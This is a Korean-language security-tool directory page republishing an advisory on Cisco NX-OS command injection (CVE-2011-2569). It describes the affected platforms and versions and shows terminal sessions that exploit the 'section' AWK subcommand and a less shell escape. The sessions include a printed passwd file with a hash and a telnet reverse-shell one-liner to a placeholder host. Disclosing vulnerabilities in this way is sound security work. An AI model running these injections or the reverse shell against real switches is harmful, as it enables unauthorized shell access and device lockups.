Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
secpub — 공개된 보안 취약점, 연구 및 관련 정보. | Kitploit
도구/GitHubGitHub/darkarnium/secpub
Embedded Systems SecurityPrivilege EscalationVulnerability AnalysisExploitationNetwork SecurityPenetration TestingPapers & ResearchLearning & EducationCurated Resources
GitHubdarkarnium/secpub

secpub

공개된 보안 취약점, 연구 및 관련 정보.

138296년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기

Cisco Nexus OS (NX-OS) - 명령어 "인젝션" / 입력 값 정화 문제.

발견자:
  • Peter Adkins [email protected]
접근 권한:
  • 로컬; 인증된 접근이 필요합니다.
추적 및 식별자:
  • CVE - CVE-2011-2569
영향을 받는 OS:
  • Cisco Nexus OS (NX-OS)
벤더 협력:
  • 통보됨 - 일부 플랫폼에 패치 제공 / 구현됨.
영향을 받는 시스템 / 플랫폼:
  • Nexus 7000
  • Nexus 5000
  • Nexus 4000
  • Nexus 3000
  • Nexus 2000
  • Nexus 1000V
  • MDS
  • UCS
참고:

로컬 접근이 필요합니다. 그러나 권한이 없는 계정도 기본 Linux 운영 체제에 접근할 수 있어 사실상 장치에 대한 완전한 접근 권한을 제공합니다. 이는 NOC 및 기타 직원이 1차 대응을 위해 낮은 수준의 접근 권한을 부여받는 환경에서 문제를 일으킬 수 있습니다.

NX-OS - "section" 하위 명령어 - 명령어 "인젝션" / 입력 값 정화 문제.

이 문제는 Nexus 7000 플랫폼에서 발견되었습니다. 다음 플랫폼에도 영향을 미치는 것으로 추정됩니다:

  • Nexus 7000 ( OS < 5.2(1.61)S0 5.2(1)S73 5.2(1)S72 )
  • Nexus 5000 ( OS < UNK )
  • Nexus 4000 ( OS < UNK )
  • Nexus 3000 ( OS < UNK )
  • Nexus 2000 ( OS < UNK )
  • MDS ( OS < 5.2(1.61)S0 5.2(1)S73 5.2(1)S72 )

section 명령어는 요청된 문자열이 전달되는 AWK 스크립트로 보입니다. 그러나 입력이 올바르게 정화되지 않는 것으로 보입니다. 결과적으로 AWK를 사용하여 Linux 하위 시스템에서 임의의 명령을 실행할 수 있습니다.

root@kitploit:~
nx1# sh clock | sed 's/.*/BEGIN \{ system\(\"id"\) \}/' > 20110713.awk
Warning: There is already a file existing with this name. Do you want to
overwrite (yes/no)? [no] y

nx1# sh clock | sec '* -f /bootflash/20110713.awk '
uid=2003(user) gid=504(network-operator)
11:16:04.082 UTC Wed Jul 13 2011

nx1# sh clock | sed 's/.*/BEGIN \{ system\(\"ls \/mnt\/cfg\/0\/"\) \}/' > 20110713.awk

nx1# sh clock | sec '* -f /bootflash/20110713.awk '
ascii
bin
boot
cfglabel.sysmgr
debug
licenses
linux
log
lost+found
11:18:41.885 UTC Wed Jul 13 2011

이를 사용하여 bootflash의 모든 파일을 삭제하고 시스템에 'reboot' 명령을 내릴 수도 있습니다. 그러나 Linux 하위 시스템에서 재부팅하면 실제로 장치를 리로드하는 대신 장치가 콘솔에 메시지를 쏟아내고 잠기게 됩니다.

NX-OS - "less" 하위 명령어 - 명령어 "인젝션" / 입력 값 정화 문제.

다음 소프트웨어 버전에 영향을 미치는 것으로 추정됩니다:

  • Nexus 7000 ( OS < 5.1(1) )
  • Nexus 5000 ( OS < 4.2(1)N2(1) )
  • Nexus 4000 ( OS < UNK)
  • Nexus 2000 ( OS < 4.2(1)N2(1) )
  • UCS ( OS < 1.4(1i) 1.3(1c) )
    • UCS 플랫폼에서는 주입된 명령이 root로 실행됩니다.
  • Nexus 1000V ( OS < UNK )
  • MDS ( OS < 5.1(1) )

예를 들어:

root@kitploit:~
switch# sh clock | less

less가 표시되면 콜론(:)을 누른 다음 "e"를 눌러 파일 경로를 지정하면 파일을 열 수 있습니다.

root@kitploit:~
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/usr/sbin:
sys:*:3:3:sys:/dev:
ftp:*:15:14:ftp:/var/ftp:/isanboot/bin/nobash
ftpuser:UvdRSOzORvz9o:99:14:ftpuser:/var/ftp:/isanboot/bin/nobash
nobody:*:65534:65534:nobody:/home:/bin/sh
admin:x:2002:503::/var/home/admin:/isan/bin/vsh_perm

그러나 이것 역시 읽기 전용 접근에 불과합니다. 하지만 "|"(파이프) 다음에 "$" 키 매크로를 사용하면 명령을 실행할 수 있습니다.

root@kitploit:~
!ls -lah > /bootflash/20110715

아래와 같이 boot-flash에 파일이 생성되었습니다.

root@kitploit:~
switch# dir
      97     Jul 15 12:01:44 2011  20110715

이 방법을 사용하여 다음 명령으로 NX-OS Linux 하위 시스템에 원격 셸을 구축할 수 있었습니다:

root@kitploit:~
 mknod rs p; telnet ad.dr.es.s 8888 0<rs | /bin/bash 1>rs

reboot 명령도 유효한 입력으로 받아들여집니다. 그러나 장치를 재부팅하는 대신 콘솔에 오류를 쏟아내면서 시스템이 잠기게 됩니다.

root@kitploit:~
 switch# sh clock | less
 Fri Jul 15 12:06:30 UTC 2011
 !reboot

 Broadcast message from root (Fri Jul 15 12:06:39 2011):
도구 다운로드